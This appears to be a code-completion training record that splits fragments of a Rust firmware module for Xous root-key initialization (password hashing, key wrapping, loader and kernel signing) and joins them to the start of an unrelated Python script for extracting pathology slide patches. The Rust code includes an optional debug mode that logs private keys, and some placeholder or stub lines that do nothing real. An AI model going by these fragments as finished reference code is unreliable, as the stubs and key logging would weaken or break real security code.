hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
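// Hedged sketch (added; not part of the original file): the verification counterpart to
// sign_loader/sign_kernel. A verifier rebuilds the same Sha512 prehash over the signed
// region and checks the detached signature against the self-signing public key.
// `verify_region` is a hypothetical helper; sign_prehashed/verify_prehashed are the
// ed25519_dalek prehashed-message APIs used above.
//
//   fn verify_region(pubkey: &ed25519_dalek::PublicKey, region: &[u8], sig: &Signature) -> bool {
//       let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
//       hasher.update(region);
//       pubkey.verify_prehashed(hasher, None, sig).is_ok()
//   }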
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
} |
update_progress(10, progress_modal, progress_action); | random_line_split |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that hold all plaintext passwords, keys, and temp data. They are kept in two well-defined pages so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => self.boot_password_policy = PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => self.update_password_policy = PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] |
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
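// Clarifying note (added): KEYROM addresses are 32-bit word addresses, so a 256-bit key such
// as KeyRomLocs::USER_KEY (0x28) spans the eight consecutive words 0x28..=0x2f, and a 128-bit
// value such as PEPPER (0xf8) spans the four words 0xf8..=0xfb. The loops above walk those
// word addresses and reassemble each word's bytes in big-endian order.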
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being uninitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do it this way to make as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(10, progress_modal, progress_action);
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// note: strictly speaking, we wouldn't have to XOR with the hashed boot password here --
// this key isn't used by this routine, just initialized -- it only matters that it is XORed
// with the password by the time it's first used to encrypt something. Doing it now simply
// means the wrapped (encrypted) form is what gets staged below.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in boot_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn debug_staging(&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for passing buffers around. Instead, we create a single buffer and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 {
// read until we get a buffer that's not fully filled
break;
}
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
}
| {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} | identifier_body |
extract_patches2.py | """Here the slide is read using the mask's dimensions (rather than the slide's own), to prevent the slide and mask from differing in size"""
from openslide import open_slide, __library_version__ as openslide_lib_version, __version__ as openslide_version
import numpy as np
import random, os, glob, time
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from skimage.color import rgb2hsv
import pandas as pd
#from save_npy import get_arg
'''
args = get_arg()
# set levels: 0 to 7 (greater than 4 not recommended)
lev1 = args.lev1
lev2 = args.lev2
# set patch sizes (I don't recommend changing this, although making it smaller
# will decrease run time)
patch_size = args.patch_size
patch_centre = args.patch_centre
my_pre_process = 'rescale_' + str(lev1) + '-' + str(lev2)
# choose conv base: 'Inception' or 'my-conv-base'
my_conv_base = args.my_conv_base
model_name = 'multi-input_' + my_conv_base + '_lev' + str(lev1) + str(lev2)
is_trainval_test = args.is_trainval_test
tif_folder = args.tif_folder
mask_folder = args.mask_folder
save_folder = args.save_folder
num_per_img = args.num_per_img
num_random_sample = args.num_random_sample
'''
# =======================Collect train/val and test patches=======================
# functions provided by Joshua Gordon
# See https://openslide.org/api/python/#openslide.OpenSlide.read_region
# Note: x,y coords are with respect to level 0.
def read_slide(slide, x, y, level, width, height, as_float=False):
""" Read a region from the slide
    Return a numpy RGB array
"""
im = slide.read_region((x, y), level, (width, height))
im = im.convert('RGB') # drop the alpha channel
if as_float:
im = np.asarray(im, dtype=np.float32)
else:
im = np.asarray(im)
assert im.shape == (height, width, 3) # 3:rgb
return im
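# A minimal usage sketch (illustrative only; the slide path below is an assumed placeholder, not
# part of this project): read_slide takes level-0 x/y coordinates and returns an
# (height, width, 3) RGB array, so a whole-slide thumbnail at level 4 can be read like this:
#
#   example_slide = open_slide('/data/slides/tumor_001.tif')   # hypothetical path
#   thumb_w, thumb_h = example_slide.level_dimensions[4]
#   thumbnail = read_slide(example_slide, x=0, y=0, level=4,
#                          width=thumb_w, height=thumb_h)
#   thumbnail.shape  # (thumb_h, thumb_w, 3)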
'''
def find_tissue_pixels(image, intensity=0.8):
""" Return tissue pixels for an image
"""
im_gray = rgb2gray(image)
assert im_gray.shape == (image.shape[0], image.shape[1])
    indices = np.where(im_gray <= intensity)  # return the coordinates that meet the condition; the first array holds indices along the first dimension, the second along the second dimension
return zip(indices[0], indices[1])
'''
def find_tissue_pixels(image):
""" Return tissue pixels for an image
"""
img_RGB = np.array(image)
img_HSV = rgb2hsv(img_RGB)
background_R = img_RGB[:, :, 0] > 203
background_G = img_RGB[:, :, 1] > 191
background_B = img_RGB[:, :, 2] > 201
tissue_RGB = np.logical_not(background_R & background_G & background_B)
tissue_S = img_HSV[:, :, 1] > 0.1113
    # If only the saturation threshold above were used, some white fatty regions in the middle would be cut off, so an extra minimum-RGB check is applied below
rgb_min = 50
min_R = img_RGB[:, :, 0] > rgb_min
min_G = img_RGB[:, :, 1] > rgb_min
min_B = img_RGB[:, :, 2] > rgb_min
tissue_mask = tissue_S & tissue_RGB & min_R & min_G & min_B
indices = np.where(tissue_mask == 1)
return zip(indices[0], indices[1])
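# Worked example (illustrative pixel values): a near-white pixel such as RGB (250, 240, 245) exceeds
# all three background thresholds (R > 203, G > 191, B > 201), so tissue_RGB is False and it is
# dropped as background; a pink tissue pixel such as RGB (200, 120, 160) fails the background test
# and, having saturation above 0.1113 and every channel above 50, is kept as tissue.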
def apply_mask(im, mask, color=(1, 0, 0)):
""" Return the mask as an image
"""
masked = np.zeros(im.shape)
for x, y in mask: masked[x][y] = color
return masked
def get_patches(slide, tumor_mask, lev, x0, y0, patch_size):
""" Get patches from a slide: RBG image, tumor mask, tissue mask CENTERED at x0, y0
imputs:
- slide: OpenSlide object for RGB slide images
- tumor_mask: OpenSlide object for tumor masks
- lev: int, target zoom level for the patches, between 0 and 7
- x0, y0: int, pixel coordinates at level 0
- patch_size: int, usually 299
outputs:
        - patch_image: array, RGB image
- patch_mask: array, tumor mask
- patch_tissue: array, tissue mask
"""
# calc downsample factor
downsample_factor = 2 ** lev
    # calc new x and y so that the patch is CENTERED on the input x and y
new_x = x0 - (patch_size // 2) * downsample_factor
new_y = y0 - (patch_size // 2) * downsample_factor
# read RGB patch
patch_image = read_slide(slide,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
